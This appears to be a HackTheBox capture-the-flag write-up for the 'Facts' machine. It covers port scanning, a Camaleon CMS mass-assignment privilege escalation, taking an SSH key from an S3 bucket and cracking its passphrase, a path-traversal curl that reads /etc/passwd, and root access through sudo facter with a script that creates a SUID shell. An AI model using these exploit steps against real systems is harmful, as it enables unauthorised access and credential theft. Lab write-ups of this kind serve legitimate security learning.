<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>Facts | HackTheBox -
</title><link rel=alternate href=https://h4r1337.github.io/posts/facts/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/facts/><link rel=prev href=https://h4r1337.github.io/posts/jeeves/><link rel=next href=https://h4r1337.github.io/posts/trick/><meta name=description content="Facts is an easy machine where we exploit a mass assignment vulnerability to get admin access on an open source CMS written in rails. We will get `SSH` key of a user from an AWS S3 bucket using credentials, exposed in the admin panel. From there to root is fairly straight forward by exploiting a SUID binary, [`facter` (a tool used in Puppet)](https://github.com/puppetlabs/facter), to load malicious script."><meta name=keywords content="HTB,hackthebox,Writeup,Walkthrough,Resource,Linux,Easy,rails,RCE,SSH,ssh-keygen,aws,aws-s3,facter,path-traversal,mass-assignment,cve-2025-2304,cve-2024-46987,ssh2john,john"><meta property="og:url" content="https://h4r1337.github.io/posts/facts/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="Facts | HackTheBox"><meta property="og:description" content="Facts is an easy machine where we exploit a mass assignment vulnerability to get admin access on an open source CMS written in rails. We will get `SSH` key of a user from an AWS S3 bucket using credentials, exposed in the admin panel. From there to root is fairly straight forward by exploiting a SUID binary, [`facter` (a tool used in Puppet)](https://github.com/puppetlabs/facter), to load malicious script."><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2026-06-07T10:55:38+05:30"><meta property="article:modified_time" content="2026-06-07T10:55:38+05:30"><meta property="article:tag" content="Camaleon-Cms"><meta property="article:tag" content="Cve-2025-2304"><meta property="article:tag" content="Cve-2024-46987"><meta property="article:tag" content="Path-Traversal"><meta property="article:tag" content="Mass-Assignment"><meta property="article:tag" content="Rails"><meta property="og:image" content="https://h4r1337.github.io/img/facts/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/tombwatcher/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/postman/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/trick/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/jeeves/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/fluffy/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/resource/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/facts/cover.webp"><meta name=twitter:title content="Facts | HackTheBox"><meta name=twitter:description content="Facts is an easy machine where we exploit a mass assignment vulnerability to get admin access on an open source CMS written in rails. We will get `SSH` key of a user from an AWS S3 bucket using credentials, exposed in the admin panel. From there to root is fairly straight forward by exploiting a SUID binary, [`facter` (a tool used in Puppet)](https://github.com/puppetlabs/facter), to load malicious script."><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.4e9051d9b14352f5f7ae64b91bb7e552a03ad7b9d27cbffac49ee91418235015.css integrity="sha256-TpBR2bFDUvX3rmS5G7flUqA617nSfL/6xJ7pFBgjUBU="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/camaleon-cms/ class=tag>CAMALEON-CMS</a>
,
<a href=https://h4r1337.github.io/tags/cve-2025-2304/ class=tag>CVE-2025-2304</a>
,
<a href=https://h4r1337.github.io/tags/cve-2024-46987/ class=tag>CVE-2024-46987</a>
,
<a href=https://h4r1337.github.io/tags/path-traversal/ class=tag>PATH-TRAVERSAL</a>
,
<a href=https://h4r1337.github.io/tags/mass-assignment/ class=tag>MASS-ASSIGNMENT</a>
,
<a href=https://h4r1337.github.io/tags/rails/ class=tag>RAILS</a>
,
<a href=https://h4r1337.github.io/tags/aws-s3/ class=tag>AWS-S3</a>
,
<a href=https://h4r1337.github.io/tags/ssh-key/ class=tag>SSH-KEY</a>
,
<a href=https://h4r1337.github.io/tags/facter/ class=tag>FACTER</a>
,
<a href=https://h4r1337.github.io/tags/ssh2john/ class=tag>SSH2JOHN</a>
,
<a href=https://h4r1337.github.io/tags/john/ class=tag>JOHN</a></span></div><h1 class=header-title itemprop=headline>Facts | HackTheBox</h1><div class=post-meta><time datetime="2026-06-07 10:55:38 +0530 +0530" itemprop=datePublished>2026-06-07
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2026-06-07 10:55:38 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>Facts is an easy machine where we exploit a mass assignment vulnerability to get admin access on an open source CMS written in rails. We will get `SSH` key of a user from an AWS S3 bucket using credentials, exposed in the admin panel. From there to root is fairly straight forward by exploiting a SUID binary, [`facter` (a tool used in Puppet)](https://github.com/puppetlabs/facter), to load malicious script.</span></div></header><div class=page-content itemprop=articleBody><h3 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h3><figure><img src=/img/facts/cover.webp></figure><table><thead><tr><th style=text-align:center>Title</th><th style=text-align:center><a href=https://app.hackthebox.com/machines/Facts>Facts</a></th></tr></thead><tbody><tr><td style=text-align:center>Difficulty</td><td style=text-align:center>Easy</td></tr><tr><td style=text-align:center>Machine</td><td style=text-align:center>Windows</td></tr><tr><td style=text-align:center>Maker</td><td style=text-align:center><a href=https://app.hackthebox.com/users/512308><img src=https://www.hackthebox.com/badge/image/512308 alt style=display:unset></a></td></tr></tbody></table><br><div class="alert alert-tip collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-bulb"></i><p class=alert-heading>About Facts</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>Facts is an easy machine where we exploit a mass assignment vulnerability to get admin access on an open source CMS written in rails. We will get <code>SSH</code> key of a user from an AWS S3 bucket using credentials, exposed in the admin panel. From there to root is fairly straight forward by exploiting a SUID binary, <a href=https://github.com/puppetlabs/facter><code>facter</code> (a tool used in Puppet)</a>, to load malicious script.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><hr><h2 id=information-gathering><a href=#information-gathering class=anchor-head aria-label=Anchor></a>Information Gathering</h2><p>Scanned all TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -p- --min-rate <span style=color:#d3869b>5000</span> -vv $IP -oA recon/nmap/ports
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.129.245.101
</span></span><span style=display:flex><span>Host is up, received conn-refused <span style=color:#fe8019>(</span>0.31s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Scanned at 2026-02-07 13:57:56 IST <span style=color:#fe8019>for</span> 125s
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>46693</span> closed tcp ports <span style=color:#fe8019>(</span>conn-refused<span style=color:#fe8019>)</span>, <span style=color:#d3869b>18839</span> filtered tcp ports <span style=color:#fe8019>(</span>no-response<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>PORT      STATE SERVICE REASON
</span></span><span style=display:flex><span>22/tcp    open  ssh     syn-ack
</span></span><span style=display:flex><span>80/tcp    open  http    syn-ack
</span></span><span style=display:flex><span>54321/tcp open  unknown syn-ack
</span></span></code></pre></div><p>Enumerated open TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -p22,80,54321 -sC -sV --min-rate <span style=color:#d3869b>5000</span> $IP -oA recon/nmap/services
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> facts.htb <span style=color:#fe8019>(</span>10.129.245.101<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up <span style=color:#fe8019>(</span>0.31s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT      STATE SERVICE VERSION
</span></span><span style=display:flex><span>22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 <span style=color:#fe8019>(</span>Ubuntu Linux; protocol 2.0<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>| ssh-hostkey: 
</span></span><span style=display:flex><span>|   <span style=color:#d3869b>256</span> 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 <span style=color:#fe8019>(</span>ECDSA<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_  <span style=color:#d3869b>256</span> a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 <span style=color:#fe8019>(</span>ED25519<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>80/tcp    open  http    nginx 1.26.3 <span style=color:#fe8019>(</span>Ubuntu<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_http-server-header: nginx/1.26.3 <span style=color:#fe8019>(</span>Ubuntu<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_http-title: facts
</span></span><span style=display:flex><span>54321/tcp open  http    Golang net/http server
</span></span><span style=display:flex><span>|_http-title: Did not follow redirect to http://facts.htb:9001
</span></span><span style=display:flex><span>| fingerprint-strings: 
</span></span><span style=display:flex><span>|   FourOhFourRequest: 
</span></span><span style=display:flex><span>|     HTTP/1.0 <span style=color:#d3869b>400</span> Bad Request
</span></span><span style=display:flex><span>|     Accept-Ranges: bytes
</span></span><span style=display:flex><span>|     Content-Length: <span style=color:#d3869b>303</span>
</span></span><span style=display:flex><span>|     Content-Type: application/xml
</span></span><span style=display:flex><span>|     Server: MinIO
</span></span><span style=display:flex><span>|     Strict-Transport-Security: max-age<span style=color:#fe8019>=</span>31536000; includeSubDomains
</span></span><span style=display:flex><span>|     Vary: Origin
</span></span><span style=display:flex><span>|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
</span></span><span style=display:flex><span>|     X-Amz-Request-Id: 1891E9EAF736568A
</span></span><span style=display:flex><span>|     X-Content-Type-Options: nosniff
</span></span><span style=display:flex><span>|     X-Xss-Protection: 1; mode<span style=color:#fe8019>=</span>block
</span></span><span style=display:flex><span>|     Date: Sat, <span style=color:#d3869b>07</span> Feb <span style=color:#d3869b>2026</span> 08:35:23 GMT
</span></span><span style=display:flex><span>|     &lt;?xml version<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;1.0&#34;</span> encoding<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;UTF-8&#34;</span>?&gt;
</span></span><span style=display:flex><span>|     &lt;Error&gt;&lt;Code&gt;InvalidRequest&lt;/Code&gt;&lt;Message&gt;Invalid Request <span style=color:#fe8019>(</span>invalid argument<span style=color:#fe8019>)</span>&lt;/Message&gt;&lt;Resource&gt;/nice ports,/Trinity.txt.bak&lt;/Resource&gt;&lt;RequestId&gt;1891E9EAF736568A&lt;/RequestId&gt;&lt;HostId&gt;dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8&lt;/HostId&gt;&lt;/Error&gt;
</span></span><span style=display:flex><span>|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
</span></span><span style=display:flex><span>|     HTTP/1.1 <span style=color:#d3869b>400</span> Bad Request
</span></span><span style=display:flex><span>|     Content-Type: text/plain; charset<span style=color:#fe8019>=</span>utf-8
</span></span><span style=display:flex><span>|     Connection: close
</span></span><span style=display:flex><span>|     Request
</span></span><span style=display:flex><span>|   GetRequest: 
</span></span><span style=display:flex><span>|     HTTP/1.0 <span style=color:#d3869b>400</span> Bad Request
</span></span><span style=display:flex><span>|     Accept-Ranges: bytes
</span></span><span style=display:flex><span>|     Content-Length: <span style=color:#d3869b>276</span>
</span></span><span style=display:flex><span>|     Content-Type: application/xml
</span></span><span style=display:flex><span>|     Server: MinIO
</span></span><span style=display:flex><span>|     Strict-Transport-Security: max-age<span style=color:#fe8019>=</span>31536000; includeSubDomains
</span></span><span style=display:flex><span>|     Vary: Origin
</span></span><span style=display:flex><span>|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
</span></span><span style=display:flex><span>|     X-Amz-Request-Id: 1891E9E626F16AE7
</span></span><span style=display:flex><span>|     X-Content-Type-Options: nosniff
</span></span><span style=display:flex><span>|     X-Xss-Protection: 1; mode<span style=color:#fe8019>=</span>block
</span></span><span style=display:flex><span>|     Date: Sat, <span style=color:#d3869b>07</span> Feb <span style=color:#d3869b>2026</span> 08:35:03 GMT
</span></span><span style=display:flex><span>|     &lt;?xml version<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;1.0&#34;</span> encoding<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;UTF-8&#34;</span>?&gt;
</span></span><span style=display:flex><span>|     &lt;Error&gt;&lt;Code&gt;InvalidRequest&lt;/Code&gt;&lt;Message&gt;Invalid Request <span style=color:#fe8019>(</span>invalid argument<span style=color:#fe8019>)</span>&lt;/Message&gt;&lt;Resource&gt;/&lt;/Resource&gt;&lt;RequestId&gt;1891E9E626F16AE7&lt;/RequestId&gt;&lt;HostId&gt;dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8&lt;/HostId&gt;&lt;/Error&gt;
</span></span><span style=display:flex><span>|   HTTPOptions: 
</span></span><span style=display:flex><span>|     HTTP/1.0 <span style=color:#d3869b>200</span> OK
</span></span><span style=display:flex><span>|     Vary: Origin
</span></span><span style=display:flex><span>|     Date: Sat, <span style=color:#d3869b>07</span> Feb <span style=color:#d3869b>2026</span> 08:35:03 GMT
</span></span><span style=display:flex><span>|_    Content-Length: <span style=color:#d3869b>0</span>
</span></span><span style=display:flex><span>|_http-server-header: MinIO
</span></span></code></pre></div><hr><h2 id=enumeration><a href=#enumeration class=anchor-head aria-label=Anchor></a>Enumeration</h2><h3 id=port-80---http-nginx><a href=#port-80---http-nginx class=anchor-head aria-label=Anchor></a>Port 80 - HTTP (Nginx)</h3><figure><img src=/img/facts/Pasted%20image%2020260207140102.webp></figure><p><strong>/admin</strong></p><p>Account registration is enabled.</p><figure><img src=/img/facts/Pasted%20image%2020260207142203.webp></figure><p>This is Camaleon CMS, Version - 2.9.0</p><figure><img src=/img/facts/Pasted%20image%2020260207142327.webp></figure><p>But right now, our role is <code>client</code>.</p><figure><img src=/img/facts/Pasted%20image%2020260207145319.webp></figure><p>This version of Camaleon CMS is vulnerable to privilege escalation via <a href=https://nvd.nist.gov/vuln/detail/CVE-2025-2304>CVE-2025-2304</a>
Found an <a href=https://github.com/Alien0ne/CVE-2025-2304>exploit</a></p><h3 id=admin-privilege-escalation><a href=#admin-privilege-escalation class=anchor-head aria-label=Anchor></a>Admin Privilege Escalation</h3><p>This CVE is about a mass assignment vulnerability in the ruby source code. This is the controller code that is responsible for this vulnerability:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-ruby data-lang=ruby><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>updated_ajax</span>
</span></span><span style=display:flex><span>  @user <span style=color:#fe8019>=</span> current_site<span style=color:#fe8019>.</span>users<span style=color:#fe8019>.</span>find(params<span style=color:#fe8019>[</span><span style=color:#83a598>:user_id</span><span style=color:#fe8019>]</span>)
</span></span><span style=display:flex><span>  update_session <span style=color:#fe8019>=</span> current_user_is?(@user)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  @user<span style=color:#fe8019>.</span>update(params<span style=color:#fe8019>.</span>require(<span style=color:#83a598>:password</span>)<span style=color:#fe8019>.</span>permit!)
</span></span><span style=display:flex><span>  render <span style=color:#83a598>inline</span>: @user<span style=color:#fe8019>.</span>errors<span style=color:#fe8019>.</span>full_messages<span style=color:#fe8019>.</span>join(<span style=color:#b8bb26>&#39;, &#39;</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#928374;font-style:italic># keep user logged in when changing their own password</span>
</span></span><span style=display:flex><span>  update_auth_token_in_cookie @user<span style=color:#fe8019>.</span>auth_token <span style=color:#fe8019>if</span> update_session <span style=color:#fe8019>&amp;&amp;</span> @user<span style=color:#fe8019>.</span>saved_change_to_password_digest?
</span></span><span style=display:flex><span><span style=color:#fe8019>end</span>
</span></span></code></pre></div><p>Since Rails 4, mass assignment is protected by default and you must explicitly define which parameters are allowed. But by using <code>.permit!</code> you allow any incoming data for the user object.</p><p>To exploit this we have to capture the change password request and add <code>password[role]=admin</code> to the HTTP body.</p><figure><img src=/img/facts/Pasted%20image%2020260207150610.webp></figure><h3 id=s3-bucket><a href=#s3-bucket class=anchor-head aria-label=Anchor></a>S3 bucket</h3><p>Found aws credentials inside admin panel.</p><figure><img src=/img/facts/Pasted%20image%2020260207154223.webp></figure><p>Add the credentials using <code>aws configure</code>.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>aws s3 ls --endpoint http://facts.htb:54321
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>2025-09-11 17:36:52 internal
</span></span><span style=display:flex><span>2025-09-11 17:36:52 randomfacts
</span></span></code></pre></div><figure><img src=/img/facts/Pasted%20image%2020260207154358.webp></figure><p>Found ssh key inside the bucket <code>internal</code></p><figure><img src=/img/facts/Pasted%20image%2020260207154455.webp></figure><hr><h2 id=exploitation><a href=#exploitation class=anchor-head aria-label=Anchor></a>Exploitation</h2><h3 id=cracking-ssh-key-passphrase><a href=#cracking-ssh-key-passphrase class=anchor-head aria-label=Anchor></a>Cracking SSH key passphrase</h3><p>If we <code>cat</code> the SSH key, we can see that no username is specified. We can use <code>ssh-keygen</code> with the <code>-y</code> flag to export the public key and determine the associated username.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh-keygen -yf id_ed25519
</span></span></code></pre></div><figure><img src=/img/facts/ssh-keygen-passphrase.webp></figure><p>Use <code>ssh2john</code> to convert the ssh key into hash that can be cracked with <code>john</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh2john id_ed25519 &gt; ssh.key
</span></span></code></pre></div><p>Now use john to crack the passphrase.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>john key.ssh --wordlist<span style=color:#fe8019>=</span>/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
</span></span></code></pre></div><figure><img src=/img/facts/Pasted%20image%2020260207171843.webp></figure><p>The username can be found using this passphrase.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh-keysign -p -f id_ed25519
</span></span></code></pre></div><figure><img src=/img/facts/Pasted%20image%2020260207172048.webp></figure><p>And we can now use these information to ssh into the system</p><figure><img src=/img/facts/Pasted%20image%2020260207172206.webp></figure><p><code>user.txt</code> can be found inside user william</p><figure><img src=/img/facts/Pasted%20image%2020260207172337.webp></figure><h3 id=initial-access-unintended-method><a href=#initial-access-unintended-method class=anchor-head aria-label=Anchor></a>Initial Access (Unintended method)</h3><p>There&rsquo;s another way to get the username and ssh key from the machine by exploiting another CVE (which was supposedly patched in Camaleon CMS >= 2.8.1, but was still working in 2.9.0). With this exploit we can skip the entire AWS S3 path, and ssh directly into the trivia user.</p><p>The vulnerability is a path traversal in <code>/admin/media/download_private_file</code> tracked as <a href=https://rubysec.com/advisories/CVE-2024-46987/>CVE-2024-46987</a>. With this attacker can enter arbitrary path in the <code>file</code> parameter and download that file.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>curl -ik http://facts.htb/admin/media/download_private_file?file<span style=color:#fe8019>=</span>../../../../../../etc/passwd
</span></span></code></pre></div><hr><h2 id=privilege-escalation><a href=#privilege-escalation class=anchor-head aria-label=Anchor></a>Privilege Escalation</h2><h3 id=local-enumeration><a href=#local-enumeration class=anchor-head aria-label=Anchor></a>Local Enumeration</h3><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>sudo -l
</span></span></code></pre></div><figure><img src=/img/facts/Pasted%20image%2020260207200224.webp></figure><blockquote><p>The <code>facter</code> command-line interface (CLI) is a tool for <strong>gathering and displaying facts</strong> (system information) about a node (system). These facts, such as hardware details, network settings, and operating system information, are then used by the Puppet automation tool for conditional expressions in its manifests.</p></blockquote><p>So basically facter is a cli tool that can be used to gather system information. It executes something called a fact, which is in fact just a ruby script, to get these informations. If we check the man page we can see that by using <code>--custom-dir</code> flag we can specify the location for a custom fact, this can be used to make the root user execute ruby scripts we create. Another way is to create an external fact, which can just a shell script. We can then use <code>--external-dir</code> to point to the directory where we put the shell script.</p><h3 id=privilege-escalation-1><a href=#privilege-escalation-1 class=anchor-head aria-label=Anchor></a>Privilege Escalation</h3><p>Since writing a shell script is easier, we will just use create an external fact.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#8ec07c>#!/bin/bash
</span></span></span><span style=display:flex><span><span style=color:#8ec07c></span>cp /bin/bash /home/trivia/rootbash
</span></span><span style=display:flex><span>chmod +s /home/trivia/rootbash
</span></span></code></pre></div><p>Create a facts directory and put this script inside it. Then we can use facter to execute the script.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>sudo facter --external-dir . suid_gen
</span></span></code></pre></div><p>And we are root!</p><figure><img src=/img/facts/Pasted%20image%2020260207202847.webp></figure><p>We could have also used a ruby script to create a custom fact and execute that insted:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-ruby data-lang=ruby><span style=display:flex><span><span style=color:#d3869b>Facter</span><span style=color:#fe8019>.</span>add(<span style=color:#83a598>:read_flag</span>) <span style=color:#fe8019>do</span>
</span></span><span style=display:flex><span>  confine <span style=color:#83a598>kernel</span>: <span style=color:#b8bb26>&#39;Linux&#39;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  setcode <span style=color:#fe8019>do</span>
</span></span><span style=display:flex><span>    path <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#39;/root/root.txt&#39;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> <span style=color:#d3869b>File</span><span style=color:#fe8019>.</span>file?(path) <span style=color:#fe8019>&amp;&amp;</span> <span style=color:#d3869b>File</span><span style=color:#fe8019>.</span>readable?(path)
</span></span><span style=display:flex><span>      <span style=color:#d3869b>File</span><span style=color:#fe8019>.</span>read(path)
</span></span><span style=display:flex><span>    <span style=color:#fe8019>else</span>
</span></span><span style=display:flex><span>      <span style=color:#fe8019>nil</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>end</span>
</span></span><span style=display:flex><span>  <span style=color:#fe8019>end</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>end</span>
